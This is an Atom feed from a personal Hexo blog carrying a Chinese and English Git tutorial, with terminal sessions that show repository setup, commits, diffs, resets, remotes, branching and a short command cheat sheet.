<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>f23y's blog</title>
<link href="https://f23y.github.io/atom.xml" rel="self"/>
<link href="https://f23y.github.io/"/>
<updated>2025-09-27T11:01:11.469Z</updated>
<id>https://f23y.github.io/</id>
<author>
<name>f23y</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>Version Control (Git)</title>
<link href="https://f23y.github.io/2023/07/07/Version%20Control%20(Git)/"/>
<id>https://f23y.github.io/2023/07/07/Version%20Control%20(Git)/</id>
<published>2023-07-06T16:25:36.000Z</published>
<updated>2025-09-27T11:01:11.469Z</updated>
<content type="html"><![CDATA[<p>这篇文章是我在上一份工作中完成的,现在分享出来希望能帮到大家 ;)</p><p><a href="https://git-scm.com/docs/">官方文档</a> 方便查阅~</p><span id="more"></span><h2 id="安装Git"><a href="#安装Git" class="headerlink" title="安装Git"></a>安装Git</h2><h3 id="Ubuntu"><a href="#Ubuntu" class="headerlink" title="Ubuntu"></a>Ubuntu</h3><p>我的版本是ubuntu2204 LTS,git在ubuntu中已经预装,在<code>terminal</code>中输入<code>git</code>或<code>git version</code>以检查git版本。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span 
class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~$ git</span><br><span class="line">usage: git [--version] [--<span class="built_in">help</span>] [-C <path>] [-c <name>=<value>]</span><br><span class="line"> [--exec-path[=<path>]] [--html-path] [--man-path] [--info-path]</span><br><span class="line"> [-p | --paginate | -P | --no-pager] [--no-replace-objects] [--bare]</span><br><span class="line"> [--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>]</span><br><span class="line"> [--super-prefix=<path>] [--config-env=<name>=<envvar>]</span><br><span class="line"> <<span class="built_in">command</span>> [<args>]</span><br><span class="line"></span><br><span class="line">These are common Git commands used <span class="keyword">in</span> various situations:</span><br><span class="line"></span><br><span class="line">start a working area (see also: git <span class="built_in">help</span> tutorial)</span><br><span class="line"> <span class="built_in">clone</span> Clone a repository into a new directory</span><br><span class="line"> init Create an empty Git repository or reinitialize an existing one</span><br><span class="line"></span><br><span class="line">work on the current change (see also: git <span class="built_in">help</span> everyday)</span><br><span class="line"> add Add file contents to the index</span><br><span class="line"> mv Move or rename a file, a directory, or a symlink</span><br><span class="line"> restore Restore working tree files</span><br><span class="line"> rm Remove files from the working tree and from the index</span><br><span class="line"></span><br><span class="line">examine the <span class="built_in">history</span> and state (see also: git <span class="built_in">help</span> revisions)</span><br><span class="line"> bisect Use binary search to find the commit that introduced a bug</span><br><span class="line"> diff Show changes between commits, commit and working 
tree, etc</span><br><span class="line"> grep Print lines matching a pattern</span><br><span class="line"> <span class="built_in">log</span> Show commit logs</span><br><span class="line"> show Show various types of objects</span><br><span class="line"> status Show the working tree status</span><br><span class="line"></span><br><span class="line">grow, mark and tweak your common <span class="built_in">history</span></span><br><span class="line"> branch List, create, or delete branches</span><br><span class="line"> commit Record changes to the repository</span><br><span class="line"> merge Join two or more development histories together</span><br><span class="line"> rebase Reapply commits on top of another base tip</span><br><span class="line"> reset Reset current HEAD to the specified state</span><br><span class="line"> switch Switch branches</span><br><span class="line"> tag Create, list, delete or verify a tag object signed with GPG</span><br><span class="line"></span><br><span class="line">collaborate (see also: git <span class="built_in">help</span> workflows)</span><br><span class="line"> fetch Download objects and refs from another repository</span><br><span class="line"> pull Fetch from and integrate with another repository or a <span class="built_in">local</span> branch</span><br><span class="line"> push Update remote refs along with associated objects</span><br><span class="line"></span><br><span class="line"><span class="string">'git help -a'</span> and <span class="string">'git help -g'</span> list available subcommands and some</span><br><span class="line">concept guides. 
See <span class="string">'git help <command>'</span> or <span class="string">'git help <concept>'</span></span><br><span class="line">to <span class="built_in">read</span> about a specific subcommand or concept.</span><br><span class="line">See <span class="string">'git help git'</span> <span class="keyword">for</span> an overview of the system.</span><br><span class="line">fr3y@fr3y-pc:~$ git --version</span><br><span class="line">14:24:49.617849 git.c:455 trace: built-in: git version</span><br><span class="line">git version 2.34.1</span><br></pre></td></tr></table></figure><h3 id="Mac-OS"><a href="#Mac-OS" class="headerlink" title="Mac OS"></a>Mac OS</h3><p>直接从AppStore安装Xcode,Xcode集成了Git,不过默认没有安装,你需要运行Xcode,选择菜单“Xcode”->“Preferences”,在弹出窗口中找到“Downloads”,选择“Command Line Tools”,点“Install”就可以完成安装了。</p><h3 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h3><p><a href="https://git-scm.com/downloads">从官网</a>下载。</p><h2 id="创建版本库"><a href="#创建版本库" class="headerlink" title="创建版本库"></a>创建版本库</h2><p>在<code>terminal</code>中输入:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ git config --global user.name "Your Name"</span><br><span class="line">$ git config --global user.email "email@example.com"</span><br></pre></td></tr></table></figure><p>注意<code>git config</code>命令的<code>--global</code>参数,用了这个参数,表示你这台机器上所有的Git仓库都会使用这个配置,当然也可以对某个仓库指定不同的用户名和Email地址。</p><p>创建新文件夹,打开,然后执行 <code>git init</code>以创建新的 git 仓库。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~$ mkdir learngit</span><br><span class="line">fr3y@fr3y-pc:~$ <span class="built_in">cd</span> learngit</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ <span class="built_in">pwd</span></span><br><span class="line">/home/fr3y/learngit</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git init</span><br><span class="line">15:50:51.222462 git.c:455 trace: built-in: git init</span><br><span class="line">hint: Using <span class="string">'master'</span> as the name <span class="keyword">for</span> the initial branch. This default branch name</span><br><span class="line">hint: is subject to change. To configure the initial branch name to use <span class="keyword">in</span> all</span><br><span class="line">hint: of your new repositories, <span class="built_in">which</span> will suppress this warning, call:</span><br><span class="line">hint: </span><br><span class="line">hint: git config --global init.defaultBranch <name></span><br><span class="line">hint: </span><br><span class="line">hint: Names commonly chosen instead of <span class="string">'master'</span> are <span class="string">'main'</span>, <span class="string">'trunk'</span> and</span><br><span class="line">hint: <span class="string">'development'</span>. 
The just-created branch can be renamed via this <span class="built_in">command</span>:</span><br><span class="line">hint: </span><br><span class="line">hint: git branch -m <name></span><br><span class="line">Initialized empty Git repository <span class="keyword">in</span> /home/fr3y/learngit/.git/</span><br></pre></td></tr></table></figure><h3 id="把文件添加到版本库"><a href="#把文件添加到版本库" class="headerlink" title="把文件添加到版本库"></a><strong>把文件添加到版本库</strong></h3><p>你的本地仓库由 git 维护的三棵“树”组成。第一个是你的 <code>工作目录</code>,它持有实际文件;第二个是 <code>暂存区(Index)</code>,它像个缓存区域,临时保存你的改动;最后是 <code>HEAD</code>,它指向你最后一次提交的结果。</p><p>你可以提出更改(把它们添加到暂存区),使用如下命令:<br> <code>git add <filename></code><br> <code>git add *</code><br>这是 git 基本工作流程的第一步;使用如下命令以实际提交改动:<br> <code>git commit -m "代码提交信息"</code><br><code>-m</code>后面输入的是本次提交的说明,可以输入任意内容。现在,你的改动已经提交到了 <strong>HEAD</strong>,但是还没到你的远端仓库。</p><p>下面创建一个readme.txt,在里面写入<code>Hello Git!</code>之后提交。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ touch readme.txt</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ cat readme.txt</span><br><span class="line">Hello Git!</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git add readme.txt</span><br><span class="line">16:23:13.117650 git.c:455 trace: built-in: git add readme.txt</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git commit -m <span class="string">"wrote a readme file"</span></span><br><span class="line">16:25:33.582306 git.c:455 trace: built-in: git commit -m <span class="string">'wrote a readme file'</span></span><br><span 
class="line">16:25:33.588250 run-command.c:668 trace: run_command: git maintenance run --auto --no-quiet</span><br><span class="line">16:25:33.607080 git.c:455 trace: built-in: git maintenance run --auto --no-quiet</span><br><span class="line">[master (root-commit) b3a217b] wrote a readme file</span><br><span class="line"> 1 file changed, 1 insertion(+)</span><br><span class="line"> create mode 100644 readme.txt</span><br></pre></td></tr></table></figure><p>接下来我们在readme.txt中添加一行<code>Git is a distributed version control system.</code>之后运行<code>git status</code>。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git status</span><br><span class="line">16:43:03.856838 git.c:455 trace: built-in: git status</span><br><span class="line">On branch master</span><br><span class="line">Changes not staged <span class="keyword">for</span> commit:</span><br><span class="line"> (use <span class="string">"git add <file>..."</span> to update what will be committed)</span><br><span class="line"> (use <span class="string">"git restore <file>..."</span> to discard changes <span class="keyword">in</span> working directory)</span><br><span class="line">modified: readme.txt</span><br><span class="line"></span><br><span class="line">no changes added to commit (use <span class="string">"git add"</span> and/or <span class="string">"git commit -a"</span>)</span><br></pre></td></tr></table></figure><p><code>git status</code>命令可以让我们时刻掌握仓库当前的状态,上面的命令输出告诉我们,<code>readme.txt</code>被修改过了,但还没有准备提交的修改。</p><p>使用<code>git diff</code>查看修改了什么内容。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git diff readme.txt </span><br><span class="line">16:46:33.087526 git.c:455 trace: built-in: git diff readme.txt</span><br><span class="line">16:46:33.087753 run-command.c:668 trace: run_command: <span class="built_in">unset</span> GIT_PAGER_IN_USE; LESS=FRX LV=-c pager</span><br><span class="line">diff --git a/readme.txt b/readme.txt</span><br><span class="line">index 106287c..768b2ea 100644</span><br><span class="line">--- a/readme.txt</span><br><span class="line">+++ b/readme.txt</span><br><span class="line">@@ -1 +1,2 @@</span><br><span class="line"> Hello Git!</span><br><span class="line">+Git is a distributed version control system.</span><br></pre></td></tr></table></figure><p>提交修改。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git add readme.txt</span><br><span class="line">16:48:27.422250 git.c:455 trace: built-in: git add readme.txt</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git 
status</span><br><span class="line">16:48:47.928238 git.c:455 trace: built-in: git status</span><br><span class="line">On branch master</span><br><span class="line">Changes to be committed:</span><br><span class="line"> (use <span class="string">"git restore --staged <file>..."</span> to unstage)</span><br><span class="line">modified: readme.txt</span><br><span class="line"></span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git commit -m <span class="string">"add a sentence"</span></span><br><span class="line">16:49:48.431119 git.c:455 trace: built-in: git commit -m <span class="string">'add a sentence'</span></span><br><span class="line">16:49:48.434682 run-command.c:668 trace: run_command: git maintenance run --auto --no-quiet</span><br><span class="line">16:49:48.436286 git.c:455 trace: built-in: git maintenance run --auto --no-quiet</span><br><span class="line">[master 354bc8d] add a sentence</span><br><span class="line"> 1 file changed, 1 insertion(+)</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git status</span><br><span class="line">16:50:12.694291 git.c:455 trace: built-in: git status</span><br><span class="line">On branch master</span><br><span class="line">nothing to commit, working tree clean</span><br></pre></td></tr></table></figure><h4 id="版本回退"><a href="#版本回退" class="headerlink" title="版本回退"></a><strong>版本回退</strong></h4><p>用<code>git log</code>查看历史记录,可加<code>--pretty=oneline</code>简洁输出。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git <span class="built_in">log</span></span><br><span class="line">21:14:00.857909 git.c:455 trace: built-in: git <span class="built_in">log</span></span><br><span class="line">21:14:00.860545 run-command.c:668 trace: run_command: <span class="built_in">unset</span> GIT_PAGER_IN_USE; LESS=FRX LV=-c pager</span><br><span class="line">commit b2e5ef1688ec5ab1db4fef39c3ab497efccf2691 (HEAD -> master)</span><br><span class="line">Author: fr3y <fr3y@qq.com></span><br><span class="line">Date: Fri Jul 1 21:03:51 2022 +0800</span><br><span class="line"></span><br><span class="line"> append GPL</span><br><span class="line"></span><br><span class="line">commit 354bc8d6c2d30c2627b7c7b2195f4907adf5e8a6</span><br><span class="line">Author: fr3y <fr3y@qq.com></span><br><span class="line">Date: Thu Jun 30 16:49:48 2022 +0800</span><br><span class="line"></span><br><span class="line"> add a sentence</span><br><span class="line"></span><br><span class="line">commit b3a217bf0f776da017119085fcde8b8133edb93a</span><br><span class="line">Author: fr3y <fr3y@qq.com></span><br><span class="line">Date: Thu Jun 30 16:25:33 2022 +0800</span><br><span class="line"></span><br><span class="line"> wrote a readme file</span><br></pre></td></tr></table></figure><p>使用<code>git reset</code>回退到上一个版本<code>add a sentence</code>。<code>HEAD</code>表示上一版本,^表示前一版本。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git reset --hard HEAD^</span><br><span 
class="line">21:28:29.207423 git.c:455 trace: built-in: git reset --hard HEAD^</span><br><span class="line">HEAD is now at 354bc8d add a sentence</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ cat readme.txt</span><br><span class="line">Hello Git!</span><br><span class="line">Git is a distributed version control system.</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>回退到任一版本,输入<code>git reset --hard</code>+<code>commit id</code> 前几位。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git reset --hard b2e5e</span><br><span class="line">21:32:41.759184 git.c:455 trace: built-in: git reset --hard b2e5e</span><br><span class="line">HEAD is now at b2e5ef1 append GPL</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ cat readme.txt</span><br><span class="line">Hello Git!</span><br><span class="line">Git is a distributed version control system under the GPL.</span><br></pre></td></tr></table></figure><p>使用<code>git reflog</code>用来记录你的每一次命令。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git reflog</span><br><span class="line">21:50:58.489027 git.c:455 trace: built-in: git reflog</span><br><span class="line">21:50:58.489821 run-command.c:668 trace: run_command: <span class="built_in">unset</span> GIT_PAGER_IN_USE; LESS=FRX LV=-c pager</span><br><span class="line">b2e5ef1 (HEAD -> master) HEAD@{0}: reset: moving to 
b2e5e</span><br><span class="line">354bc8d HEAD@{1}: reset: moving to HEAD^</span><br><span class="line">b2e5ef1 (HEAD -> master) HEAD@{2}: commit: append GPL</span><br><span class="line">354bc8d HEAD@{3}: commit: add a sentence</span><br><span class="line">b3a217b HEAD@{4}: commit (initial): wrote a readme file</span><br></pre></td></tr></table></figure><h4 id="撤销和删除"><a href="#撤销和删除" class="headerlink" title="撤销和删除"></a>撤销和删除</h4><p>把工作区的修改全部撤销。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git checkout -- readme.txt</span><br></pre></td></tr></table></figure><p><code>git reset HEAD <file></code>可以把暂存区的修改撤销掉(unstage),重新放回工作区。</p><p>从版本库中删除文件:用<code>git rm</code>删掉,并且<code>git commit</code></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ git rm test.txt</span><br><span class="line">$ git commit -m <span class="string">"remove test.txt"</span></span><br></pre></td></tr></table></figure><h2 id="远程仓库"><a href="#远程仓库" class="headerlink" title="远程仓库"></a>远程仓库</h2><h3 id="创建SSH-Key"><a href="#创建SSH-Key" class="headerlink" title="创建SSH Key"></a>创建SSH Key</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ ssh-keygen -t rsa -C <span class="string">"youremail@example.com"</span></span><br></pre></td></tr></table></figure><p>生成<code>.ssh</code>目录,里面有<code>id_rsa</code>(私钥)和<code>id_rsa.pub</code>(公钥)两个文件。登陆GitHub,打开“Account settings”,“SSH Keys”页面,点“Add SSH Key”,填上任意Title,在Key文本框里粘贴<code>id_rsa.pub</code>文件的内容,点“Add Key”,你就应该看到已经添加的Key。</p><h3 id="添加远程库"><a href="#添加远程库" class="headerlink" title="添加远程库"></a>添加远程库</h3><p>登陆GitHub,在右上角找到“Create a new repo”按钮,创建一个新的仓库,在本地的<code>learngit</code>仓库下运行命令:</p><figure class="highlight 
bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git remote add origin git@github.f23y/learngit.git</span><br></pre></td></tr></table></figure><p>下一步,就可以把本地库的所有内容推送到远程库上:<code>git push -u origin master</code></p><p>之后推送后就可以去掉-u参数。</p><h3 id="删除远程库"><a href="#删除远程库" class="headerlink" title="删除远程库"></a>删除远程库</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ git remote -v</span><br><span class="line">$ git remote rm origin</span><br></pre></td></tr></table></figure><h3 id="克隆远程库"><a href="#克隆远程库" class="headerlink" title="克隆远程库"></a>克隆远程库</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> username@host:/path/to/repository</span><br></pre></td></tr></table></figure><h2 id="分支"><a href="#分支" class="headerlink" title="分支"></a>分支</h2><p>分支是用来绝缘开发功能的。在你创建仓库的时候,<em>master</em> 是主分支。在其他分支上进行开发,完成后再将它们合并到主分支上。</p><h3 id="Create"><a href="#Create" class="headerlink" title="Create"></a>Create</h3><p>创建一个叫dev的分支。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git checkout -b dev</span><br><span class="line">00:05:42.329505 git.c:455 trace: built-in: git checkout -b dev</span><br><span class="line">Switched to a new branch <span class="string">'dev'</span></span><br></pre></td></tr></table></figure><p>修改readme.txt,加上一句<code>Branches are amazing.</code>并提交。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ cat readme.txt</span><br><span class="line">Hello Git!</span><br><span class="line">Git is a distributed version control system under the GPL.</span><br><span class="line">Branches are amazing.</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git add readme.txt </span><br><span class="line">00:13:37.503954 git.c:455 trace: built-in: git add readme.txt</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git commit -m <span class="string">"branch test"</span></span><br><span class="line">00:13:53.264494 git.c:455 trace: built-in: git commit -m <span class="string">'branch test'</span></span><br><span class="line">00:13:53.266471 run-command.c:668 trace: run_command: git maintenance run --auto --no-quiet</span><br><span class="line">00:13:53.268711 git.c:455 trace: built-in: git maintenance run --auto --no-quiet</span><br><span class="line">[dev 2b34020] branch <span class="built_in">test</span></span><br><span class="line"> 1 file changed, 1 insertion(+)</span><br></pre></td></tr></table></figure><h3 id="Delete"><a href="#Delete" class="headerlink" title="Delete"></a>Delete</h3><p>切换回主分支,合并分支,删除分支。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git checkout master</span><br><span class="line">00:14:06.064454 git.c:455 trace: built-in: git checkout master</span><br><span class="line">Switched to branch <span class="string">'master'</span></span><br><span class="line">fr3y@fr3y-pc:~/learngit$ cat readme.txt</span><br><span class="line">Hello Git!</span><br><span class="line">Git is a distributed version control system under the GPL.</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git merge dev</span><br><span class="line">00:14:37.890681 git.c:455 trace: built-in: git merge dev</span><br><span class="line">Updating b2e5ef1..2b34020</span><br><span class="line">Fast-forward</span><br><span class="line">00:14:37.901014 run-command.c:668 trace: run_command: git maintenance run --auto --no-quiet</span><br><span class="line">00:14:37.902864 git.c:455 trace: built-in: git maintenance run --auto --no-quiet</span><br><span class="line"> readme.txt | 1 +</span><br><span class="line"> 1 file changed, 1 insertion(+)</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git branch -d dev</span><br><span class="line">00:15:24.651829 git.c:455 trace: built-in: git branch -d dev</span><br><span class="line">Deleted branch dev (was 2b34020).</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git branch</span><br><span class="line">00:15:55.718369 git.c:455 trace: built-in: git branch</span><br><span class="line">00:15:55.718654 run-command.c:668 trace: run_command: <span class="built_in">unset</span> GIT_PAGER_IN_USE; LESS=FRX LV=-c pager</span><br><span class="line">* master</span><br></pre></td></tr></table></figure><h3 id="switch"><a href="#switch" class="headerlink" 
title="switch"></a>switch</h3><p>To create and switch to a new <code>dev</code> branch, use:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git switch -c dev</span><br></pre></td></tr></table></figure><p>To switch directly to the existing <code>master</code> branch, use:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git switch master</span><br></pre></td></tr></table></figure><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>One difference between Git and other version control systems such as SVN is the concept of the staging area.</p><p>Git tracks and manages modifications, not files.</p><h3 id="Git-Cheat-Sheet"><a href="#Git-Cheat-Sheet" class="headerlink" title="Git Cheat Sheet"></a>Git Cheat Sheet</h3><h4 id="配置"><a href="#配置" class="headerlink" title="配置"></a>Configuration</h4><h5 id="列出当前配置:"><a href="#列出当前配置:" class="headerlink" title="列出当前配置:"></a>List the current configuration:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git config --list</span><br></pre></td></tr></table></figure><h5 id="列出repository配置:"><a href="#列出repository配置:" class="headerlink" title="列出repository配置:"></a>List the repository configuration:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git config --local --list</span><br></pre></td></tr></table></figure><h5 id="列出全局配置:"><a href="#列出全局配置:" class="headerlink" title="列出全局配置:"></a>List the global configuration:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git config --global --list</span><br></pre></td></tr></table></figure><h5 id="列出系统配置:"><a href="#列出系统配置:" class="headerlink" title="列出系统配置:"></a>List the system configuration:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git config --system --list</span><br></pre></td></tr></table></figure>
<h5 id="设置用户名:"><a href="#设置用户名:" class="headerlink" title="设置用户名:"></a>Set the user name:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git config --global user.name "[firstname lastname]"</span><br></pre></td></tr></table></figure><h5 id="设置用户邮箱:"><a href="#设置用户邮箱:" class="headerlink" title="设置用户邮箱:"></a>Set the user email:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git config --global user.email "[valid-email]"</span><br></pre></td></tr></table></figure><h5 id="复制一个已创建的仓库"><a href="#复制一个已创建的仓库" class="headerlink" title="复制一个已创建的仓库:"></a>Clone an existing repository:</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># via SSH</span></span><br><span class="line">$ git <span class="built_in">clone</span> ssh://user@domain.com/repo.git</span><br><span class="line"></span><br><span class="line"><span class="comment"># via HTTP</span></span><br><span class="line">$ git <span class="built_in">clone</span> http://domain.com/user/repo.git</span><br></pre></td></tr></table></figure><h5 id="创建一个新的本地仓库"><a href="#创建一个新的本地仓库" class="headerlink" title="创建一个新的本地仓库:"></a>Create a new local repository:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git init</span><br></pre></td></tr></table></figure><h4 id="本地修改"><a href="#本地修改" class="headerlink" title="本地修改"></a>Local changes</h4><h5 id="显示工作路径下已修改的文件:"><a href="#显示工作路径下已修改的文件:" class="headerlink" title="显示工作路径下已修改的文件:"></a>Show modified files in the working directory:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git status</span><br></pre></td></tr></table></figure>
